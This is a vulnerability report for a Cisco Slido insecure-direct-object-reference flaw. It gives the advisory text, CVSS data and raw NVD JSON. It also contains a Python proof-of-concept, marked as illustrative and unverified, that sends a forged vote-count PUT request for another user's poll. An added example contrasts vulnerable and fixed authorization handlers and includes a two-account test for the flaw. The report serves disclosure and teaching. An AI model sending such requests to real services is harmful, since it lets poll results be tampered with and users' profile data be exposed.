Security Vulnerability Report
CVE-2026-20219 CVSS 5.4 MEDIUM


Published: 2026-05-06 17:16:22
Last Modified: 2026-05-06 18:59:53

Description

A vulnerability in the REST API of Cisco Slido could have allowed an authenticated, remote attacker to access the social profile data of other users or affect quiz and poll results. Cisco has addressed this vulnerability in Cisco Slido and no customer action is needed. This vulnerability existed because of the presence of an insecure direct object reference. Prior to this vulnerability being addressed, an attacker could have exploited this vulnerability by sending a crafted request to the vulnerable API endpoint. A successful exploit could have allowed the attacker to view the social profiles of other users or affect quiz and poll results.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Cisco Slido (versions prior to the fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Cisco Slido IDOR PoC concept.
# NOTE: the endpoint path, the payload fields and the object ID below are
# illustrative placeholders. The Cisco advisory does not publish the affected
# endpoint or request format, and this script was not verified against the
# pre-fix service; it only shows the shape of an IDOR request.

# Target: vulnerable REST API endpoint for user profiles or polls
target_api = "https://api.slido.com/v2/moderate/poll/{}"

# Attacker's authenticated headers (obtained after login)
headers = {
    "Authorization": "Bearer <attacker_valid_token>",
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/json",
}

# Victim's poll ID or user ID (the insecure direct object reference)
target_object_id = "victim_poll_id_12345"

# Malicious payload to affect poll results
payload = {"option_id": "malicious_option_id", "vote_count": 9999}

# Craft the request
exploit_url = target_api.format(target_object_id)

try:
    response = requests.put(exploit_url, json=payload, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Exploit successful! Poll/profile data modified or accessed.")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")
```
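As an added example (not Cisco's, Slido's or the PoC author's code), the following Python shows the CWE-639 pattern the description and the PoC above refer to, and the two-account differential check a tester uses to confirm it: each handler is reachable only with a valid session, but the vulnerable form trusts the object ID taken from the request, so a second authenticated account can read another user's social profile or overwrite a poll's tallies. Beside each vulnerable handler is its fixed form, where authorization is decided server-side, per object, from the session identity. The data model, the handler names, and the rule that profiles are visible only to participants of a shared event are assumptions made for illustration; the advisory does not publish the affected endpoint or its authorization model.

```python
"""Vulnerable vs. fixed object-level authorization for a poll/profile REST
API, plus the two-account check used to confirm an IDOR (CWE-639).

Added example; not Cisco's, Slido's or the PoC author's code. The data
model, handler names and the "profiles are visible within a shared event"
rule are assumptions for illustration only.
"""
import copy

# Constructed sample data (not real Slido records).
PROFILES = {
    "u1": {"name": "Alice", "linkedin": "linkedin.com/in/alice"},
    "u2": {"name": "Bob", "linkedin": "linkedin.com/in/bob"},
    "u3": {"name": "Carol", "linkedin": "linkedin.com/in/carol"},
}
POLLS = {
    "p100": {"owner": "u1", "votes": {"opt1": 3, "opt2": 1}},
    "p200": {"owner": "u2", "votes": {"opt1": 0, "opt2": 5}},
}
# Assumed visibility rule: a social profile is shared only with other
# participants of the same event.
EVENT_MEMBERS = {"evt-A": {"u1", "u3"}, "evt-B": {"u2"}}


class Forbidden(Exception):
    """Raised when an authenticated caller is not authorized for the object."""


def _share_event(a, b):
    return any({a, b} <= members for members in EVENT_MEMBERS.values())


# --- Vulnerable handlers (CWE-639). The caller is authenticated (a session
# --- user exists) but the object ID from the request is used as-is: any
# --- logged-in user can read any profile or rewrite any poll's tallies.
def get_profile_vulnerable(session_user, user_id):
    return PROFILES[user_id]


def set_votes_vulnerable(session_user, poll_id, option_id, count):
    POLLS[poll_id]["votes"][option_id] = count
    return POLLS[poll_id]["votes"]


# --- Fixed handlers. Authorization is decided per object, server-side, from
# --- the session identity; nothing in the request can widen it.
def get_profile_fixed(session_user, user_id):
    if user_id != session_user and not _share_event(session_user, user_id):
        raise Forbidden(f"{session_user} may not read profile {user_id}")
    return PROFILES[user_id]


def set_votes_fixed(session_user, poll_id, option_id, count):
    poll = POLLS[poll_id]
    if poll["owner"] != session_user:
        raise Forbidden(f"{session_user} does not moderate poll {poll_id}")
    if option_id not in poll["votes"]:
        raise KeyError(f"unknown option {option_id} for poll {poll_id}")
    poll["votes"][option_id] = count
    return poll["votes"]


def _succeeds(handler, session_user, object_id, *args):
    try:
        handler(session_user, object_id, *args)
        return True
    except Forbidden:
        return False


def idor_check(handler, owner_session, other_session, object_id, *args):
    """Two-account differential test. The owner's request must succeed and
    an unrelated authenticated account must be refused; returns True when
    the other account gets the same success as the owner, i.e. the handler
    leaks. Poll state is restored afterwards so the check has no side effects.
    """
    saved = copy.deepcopy(POLLS)
    try:
        owner_ok = _succeeds(handler, owner_session, object_id, *args)
        other_ok = _succeeds(handler, other_session, object_id, *args)
    finally:
        POLLS.clear()
        POLLS.update(saved)
    return owner_ok and other_ok


if __name__ == "__main__":
    cases = [
        ("get_profile (vulnerable)", get_profile_vulnerable, ("u1",)),
        ("get_profile (fixed)", get_profile_fixed, ("u1",)),
        ("set_votes (vulnerable)", set_votes_vulnerable, ("p100", "opt1", 9999)),
        ("set_votes (fixed)", set_votes_fixed, ("p100", "opt1", 9999)),
    ]
    for name, handler, args in cases:
        leaks = idor_check(handler, "u1", "u2", *args)
        print(f"{name:26s} IDOR: {'YES' if leaks else 'no'}")
```

The differential check is the practical form of the test: the same request is sent under an owning account and under an unrelated account that is merely logged in, and a handler is flagged when both succeed. Note that the fixed `get_profile_fixed` still lets `u3` read Alice's profile because they share an event, which is the point of deciding access per object rather than refusing everything that is not self-access.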

References

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-slido-idor-CpsFmKxN (Cisco Security Advisory cisco-sa-slido-idor-CpsFmKxN)

Weakness: CWE-639 (Authorization Bypass Through User-Controlled Key), per the NVD record below.

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20219", "sourceIdentifier": "[email protected]", "published": "2026-05-06T17:16:21.760", "lastModified": "2026-05-06T18:59:53.230", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the REST API of Cisco Slido could have allowed an authenticated, remote attacker to access the social profile data of other users or affect quiz and poll results. Cisco has addressed this vulnerability in Cisco Slido and no customer action is needed.\r\n\r This vulnerability existed because of the presence of an insecure direct object reference. Prior to this vulnerability being addressed, an attacker could have exploited this vulnerability by sending a crafted request to the vulnerable API endpoint. A successful exploit could have allowed the attacker to view the social profiles of other users or affect quiz and poll results."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-slido-idor-CpsFmKxN", "source": "[email protected]"}]}}